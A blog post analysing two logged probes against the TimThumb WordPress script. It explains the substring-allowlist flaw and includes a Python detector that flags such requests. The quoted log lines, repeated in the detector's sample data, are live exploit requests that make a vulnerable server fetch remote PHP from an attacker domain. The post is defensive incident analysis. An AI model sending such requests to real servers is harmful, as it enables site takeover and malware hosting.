Or looking for known, fixed vulnerabilities on servers that should know better (and several that shouldn't)
 

We aren’t the only ones surveying web servers!

Today, I had an interesting reminder that we are not the only ones surveying web servers. I was looking at the server logs for librivox.bookdesign.biz, a server that provides a web interface into the database that I use for my LibriVox AudioBooks android app.  As it turns out, there were a few interesting requests that produced 404 errors.  Here they are, below:

184.107.145.18 - - [05/Oct/2012:08:42:27 -0700] "GET /wp-content/themes/aquitaine/lib/custom/timthumb.php?src=http://blogger.com.arztree.com/idss.php HTTP/1.1" 404 0 - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "librivox.bookdesign.biz" ms=3 cpu_ms=0
184.107.145.18 - - [05/Oct/2012:08:42:25 -0700] "GET /wp-content/themes/aquitaine/lib/custom/timthumb.php?src=http://blogger.com.arztree.com/petx.php HTTP/1.1" 404 0 - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "librivox.bookdesign.biz" ms=4 cpu_ms=0

As it turns out, timthumb.php is a WordPress image-resizing utility, and older versions of it had a security vulnerability that let an attacker get arbitrary files, PHP included, onto the server. The script would fetch a remote image named in its src parameter as long as the host was on a short allowlist (blogger.com, flickr.com and a few others), but the allowlist check was a substring match, so a hostname such as blogger.com.arztree.com passed as "blogger.com" and whatever was fetched landed in a web-accessible cache directory. The two requests above, each asking timthumb.php to fetch a .php file from a blogger.com.arztree.com address, are exactly that attack. You can read about the weakness on the sucuri blog. Of course, it's no surprise that malicious agents are surveying web servers for vulnerabilities. It's just interesting to see it happening in practice. Had my server used the offending library, I could now be hosting drive-by downloads for some botnet.
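The following is an added example, not code from the original post or from TimThumb itself. It puts the loose substring host check next to a hardened suffix check and then runs a small detector over the two log lines above (joined onto single lines) plus two constructed benign requests, flagging timthumb.php hits whose src host only passes the loose check or that name a remote .php file. The allowlist entries are an assumption modelled on TimThumb's old $allowedSites; the exact list varied between versions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample log: the two probes quoted in the post (joined onto one
# line each) plus two benign requests added for contrast.
SAMPLE_LOG = [
    '184.107.145.18 - - [05/Oct/2012:08:42:27 -0700] "GET /wp-content/themes/aquitaine/lib/custom/timthumb.php?src=http://blogger.com.arztree.com/idss.php HTTP/1.1" 404 0 - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "librivox.bookdesign.biz" ms=3 cpu_ms=0',
    '184.107.145.18 - - [05/Oct/2012:08:42:25 -0700] "GET /wp-content/themes/aquitaine/lib/custom/timthumb.php?src=http://blogger.com.arztree.com/petx.php HTTP/1.1" 404 0 - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "librivox.bookdesign.biz" ms=4 cpu_ms=0',
    # benign, constructed: a legitimate resize of an image on an allowed host
    '203.0.113.7 - - [05/Oct/2012:09:10:02 -0700] "GET /wp-content/themes/aquitaine/lib/custom/timthumb.php?src=http://img.youtube.com/vi/abc/0.jpg&w=100 HTTP/1.1" 200 4096 - "Mozilla/5.0" "librivox.bookdesign.biz" ms=12 cpu_ms=8',
    # benign, constructed: an unrelated request
    '203.0.113.8 - - [05/Oct/2012:09:11:40 -0700] "GET /catalog/?author=Austen HTTP/1.1" 200 2048 - "Mozilla/5.0" "librivox.bookdesign.biz" ms=5 cpu_ms=3',
]

# Assumption: representative entries in the spirit of TimThumb's $allowedSites.
ALLOWED_SITES = ["flickr.com", "picasa.com", "blogger.com", "img.youtube.com", "upload.wikimedia.org"]

# Combined log format: client IP, timestamp, quoted request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def host_allowed_loose(host, allowed=ALLOWED_SITES):
    """The vulnerable check: an allowed site anywhere in the host string passes.
    Mirrors the strpos()-style substring match in old TimThumb, so
    'blogger.com.arztree.com' is accepted because it contains 'blogger.com'."""
    host = host.lower()
    return any(site in host for site in allowed)


def host_allowed_strict(host, allowed=ALLOWED_SITES):
    """The hardened check: the host must be the allowed site itself or a
    subdomain of it (suffix match on a label boundary), so an attacker-owned
    parent domain cannot smuggle an allowed name into its prefix."""
    host = host.lower().rstrip(".")
    return any(host == site or host.endswith("." + site) for site in allowed)


def parse_log_line(line):
    """Extract client IP, request target and status from one log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m.group("ip"), "target": m.group("target"), "status": int(m.group("status"))}


def find_timthumb_probes(lines):
    """Flag timthumb.php requests whose src= host passes the loose check but
    not the strict one, or that ask TimThumb to fetch a .php file."""
    probes = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        target = urlparse(rec["target"])
        if not target.path.lower().endswith("timthumb.php"):
            continue
        src = parse_qs(target.query).get("src", [None])[0]
        if not src:
            continue
        src_url = urlparse(src)
        host = src_url.hostname or ""
        reasons = []
        if host_allowed_loose(host) and not host_allowed_strict(host):
            reasons.append("allowlist spoof: %s" % host)
        if src_url.path.lower().endswith(".php"):
            reasons.append("remote PHP source")
        if reasons:
            probes.append({"ip": rec["ip"], "src": src, "status": rec["status"], "reasons": reasons})
    return probes


if __name__ == "__main__":
    for p in find_timthumb_probes(SAMPLE_LOG):
        print(p["ip"], p["status"], p["src"], "; ".join(p["reasons"]))
```

Run against the sample log, the detector reports both requests from 184.107.145.18 and nothing else; the youtube request passes both host checks and names an image, so it is left alone. Note that a 404 only means this server did not have the script; on a site that did, the same two lines with a 200 would be the thing to look for.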

I didn't take the time to thoroughly investigate 184.107.145.18 or arztree.com (the IP address points to a server hosted by iweb.com in Canada, and the domain is registered in Taiwan), as I think it is safe to assume that the trail of any potential attacker will likely be well covered. Still, the fact of the probing is a reminder that our survey in some way will mirror the efforts of various agents looking for weaknesses in web infrastructure.
